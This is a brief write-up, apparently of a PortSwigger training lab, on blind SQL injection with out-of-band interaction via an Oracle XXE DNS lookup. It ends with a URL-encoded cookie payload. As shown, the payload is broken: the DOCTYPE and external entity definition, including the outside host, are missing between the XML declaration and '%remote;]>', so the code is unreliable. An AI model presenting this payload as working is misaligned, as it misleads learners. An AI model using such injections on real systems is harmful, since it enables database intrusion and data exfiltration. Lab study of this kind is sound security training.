< Back





13. Blind SQL injection with out-of-band interaction

This web application handles SQL queries asynchronously, making it difficult to detect the results
of a SQL injection attack. This includes trying to determine the type of SQL database in use. To
solve this, we eventually use the Oracle XXE vulnerability to trigger a DNS lookup. This lab
requires the use of PortSwigger's Burp Suite Professional distribution, however, in a real
engagement you could always create your own DNS server to capture the DNS lookup. Here's the
payload:


TrackingId=Rr0hDYsZaZYs6nuZ'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--